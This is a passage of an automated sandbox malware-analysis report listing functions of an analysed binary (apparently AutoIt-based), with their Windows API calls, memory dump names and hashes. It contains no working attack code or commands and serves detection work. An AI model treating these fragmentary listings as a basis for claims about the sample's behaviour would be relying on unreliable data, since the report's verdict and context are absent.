                                                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EA14
                                                                                                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0018EA24
                                                                                                                                                          • EndPath.GDI32(00000000), ref: 0018EA34
                                                                                                                                                          • StrokePath.GDI32(00000000), ref: 0018EA44
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                          • Opcode ID: 9be8f7a58efb36365189cd42dc9b0d6cdecc07daf59624c192c7bc6120d7fd4a
                                                                                                                                                          • Instruction ID: 23b1f3db5e948c3e12c6e51e07879ce0f49d95f24fd24f597999792a8ff1dc2a
                                                                                                                                                          • Opcode Fuzzy Hash: 9be8f7a58efb36365189cd42dc9b0d6cdecc07daf59624c192c7bc6120d7fd4a
                                                                                                                                                          • Instruction Fuzzy Hash: 23110976000149BFDF069F90EC88E9A7FADEB09354F048011FA1A4A560D7719E95DBA0
                                                                                                                                                          Function 0015EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetDC.USER32(00000000), ref: 0015EFB6
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0015EFC7
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0015EFCE
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0015EFD6
                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0015EFED
                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0015EFFF
                                                                                                                                                            • Part of subcall function 0015A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0015A79D,00000000,00000000,?,0015AB73), ref: 0015B2CA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 603618608-0
                                                                                                                                                          • Opcode ID: 03fd275a63763c51fdf6f93a90d6f717605c4f200dee4ee8d0c0a095cbc51a14
                                                                                                                                                          • Instruction ID: 2ad20a56afded039808297d27bfcd29a6f0d0a61babc1e6796d4cb5933d4eb34
                                                                                                                                                          • Opcode Fuzzy Hash: 03fd275a63763c51fdf6f93a90d6f717605c4f200dee4ee8d0c0a095cbc51a14
                                                                                                                                                          • Instruction Fuzzy Hash: 7F01A7B5E00705BFEB109BA59C45B5EBFB8EF49351F044066FE09AB690D6709D00CF61
                                                                                                                                                          Function 001487D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __init_pointers.LIBCMT ref: 001487D7
                                                                                                                                                            • Part of subcall function 00141E5A: __initp_misc_winsig.LIBCMT ref: 00141E7E
                                                                                                                                                            • Part of subcall function 00141E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00148BE1
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsAlloc), ref: 00148BF5
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsFree), ref: 00148C08
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsGetValue), ref: 00148C1B
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsSetValue), ref: 00148C2E
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00148C41
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateSemaphoreExW), ref: 00148C54
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00148C67
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00148C7A
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadpoolTimer), ref: 00148C8D
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00148CA0
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00148CB3
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateThreadpoolWait), ref: 00148CC6
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadpoolWait), ref: 00148CD9
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CloseThreadpoolWait), ref: 00148CEC
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00148CFF
                                                                                                                                                          • __mtinitlocks.LIBCMT ref: 001487DC
                                                                                                                                                            • Part of subcall function 00148AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(001DAC68,00000FA0,?,?,001487E1,00146AFA,001D67D8,00000014), ref: 00148AD1
                                                                                                                                                          • __mtterm.LIBCMT ref: 001487E5
                                                                                                                                                            • Part of subcall function 0014884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 001489CF
                                                                                                                                                            • Part of subcall function 0014884D: _free.LIBCMT ref: 001489D6
                                                                                                                                                            • Part of subcall function 0014884D: RtlDeleteCriticalSection.NTDLL(001DAC68), ref: 001489F8
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014880A
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00148833
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3163737558-0
                                                                                                                                                          • Opcode ID: 9c0dd0ef0d079f016bf435e48aec9e96ec741a21ca4faa1c0842df99e6db4839
                                                                                                                                                          • Instruction ID: 9753782a9125ca31ee86f2009ee806da866ae0a0d603ae1914a623d839c561f2
                                                                                                                                                          • Opcode Fuzzy Hash: 9c0dd0ef0d079f016bf435e48aec9e96ec741a21ca4faa1c0842df99e6db4839
                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0BE3311A7526AE2247B7CBC07A9E3AC0CF21B35B710A2EF464D60F2FF5088814160
                                                                                                                                                          Function 0016A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1423608774-0
                                                                                                                                                          • Opcode ID: 04f556ce44da2b0a6de2fb49a456b462391b9820ce5146eac9086a887a4d8c67
                                                                                                                                                          • Instruction ID: c9de14e2571e5649aa2c3f2c2792548fa3069d2af68dcb7d26e23c49916124ef
                                                                                                                                                          • Opcode Fuzzy Hash: 04f556ce44da2b0a6de2fb49a456b462391b9820ce5146eac9086a887a4d8c67
                                                                                                                                                          • Instruction Fuzzy Hash: 8001A932101611DBD7152B64FD48EEB77B9FF8A702B80052AF503A2D61DB74AC50CF51
                                                                                                                                                          Function 00121867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121898
                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 001218A0
                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001218AB
                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001218B6
                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 001218BE
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 001218C6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                          • Opcode ID: 663e7c1a32f815f90124eccbb447fd5e5f20cef206df6e10d48ba024e0f0e09a
                                                                                                                                                          • Instruction ID: 17d064420b189dd7efcdd1937ae77b7c6abc925f634865bbf028c978ab3d81f2
                                                                                                                                                          • Opcode Fuzzy Hash: 663e7c1a32f815f90124eccbb447fd5e5f20cef206df6e10d48ba024e0f0e09a
                                                                                                                                                          • Instruction Fuzzy Hash: 5D0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                                                                                                                                                          Function 001684F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00168504
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0016851A
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00168529
                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168538
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168542
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168549
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                          • Opcode ID: db7168b735eea61a50b9c8c2c9f47ed04266aff431121c682500ace14aea86b9
                                                                                                                                                          • Instruction ID: 84eee40f881ebb47cec8c171d03927366aca7cda22bcd9169e5992f4570f69dc
                                                                                                                                                          • Opcode Fuzzy Hash: db7168b735eea61a50b9c8c2c9f47ed04266aff431121c682500ace14aea86b9
                                                                                                                                                          • Instruction Fuzzy Hash: C6F0B472240558BBE7201762AD0EEEF3E7CDFC7B11F000058F606D1850E7A02A81C6B4
                                                                                                                                                          Function 0016A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0016A330
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0016A341
                                                                                                                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 0016A34E
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 0016A35B
                                                                                                                                                            • Part of subcall function 00169CCE: CloseHandle.KERNEL32(?,?,0016A368,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 00169CD8
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0016A36E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0016A375
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                          • Opcode ID: de7f87a2c360b80c10f4ef0dd621765e54e6aee7c5afb8f8222f9e010f0184c0
                                                                                                                                                          • Instruction ID: 6d65113c6de87997891fb59d12d4dbff97dfc626bd97dd46de0a9f2d3d5e9716
                                                                                                                                                          • Opcode Fuzzy Hash: de7f87a2c360b80c10f4ef0dd621765e54e6aee7c5afb8f8222f9e010f0184c0
                                                                                                                                                          • Instruction Fuzzy Hash: CFF08272141A11ABD7112B64FD4CEEB7B79FF8A302F400522F203A5DA1DBB59891DB51
                                                                                                                                                          Function 0013D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                            • Part of subcall function 0012BBD9: _memmove.LIBCMT ref: 0012BC33
                                                                                                                                                          • __swprintf.LIBCMT ref: 0013D98F
                                                                                                                                                          Strings
                                                                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0013D832
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                          • API String ID: 1943609520-557222456
                                                                                                                                                          • Opcode ID: 043ae75d18c261dfa02b2fa1e0a09e03a8340335a1cdeab7808049f6978e4c42
                                                                                                                                                          • Instruction ID: 5c5bf1a9d0bd419dbac5e5cd71fac3dc0f6ac09c79943addf18bbebb2056ebdb
                                                                                                                                                          • Opcode Fuzzy Hash: 043ae75d18c261dfa02b2fa1e0a09e03a8340335a1cdeab7808049f6978e4c42
                                                                                                                                                          • Instruction Fuzzy Hash: 18917A711083119FCB14EF24E886D6EB7A9FFA9700F01495DF5969B2A1EB30EE14CB52
                                                                                                                                                          Function 0017B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B4A8
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 0017B5B7
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B73A
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantInit.OLEAUT32(00000000), ref: 0016A736
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantCopy.OLEAUT32(?,?), ref: 0016A73F
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantClear.OLEAUT32(?), ref: 0016A74B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                                                                          • Opcode ID: ad42ba562d2f982c64302fcd2c909302f720451bb4d5dc543d72f380c0f81773
                                                                                                                                                          • Instruction ID: d61ca7ca594c595302831313f7a22c530edb0db01eb1411adc487a682b80643b
                                                                                                                                                          • Opcode Fuzzy Hash: ad42ba562d2f982c64302fcd2c909302f720451bb4d5dc543d72f380c0f81773
                                                                                                                                                          • Instruction Fuzzy Hash: CF918C746083019FCB14DF24D485A5ABBF4EF99710F14886EF88A9B362DB31E945CB52
                                                                                                                                                          Function 00165D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
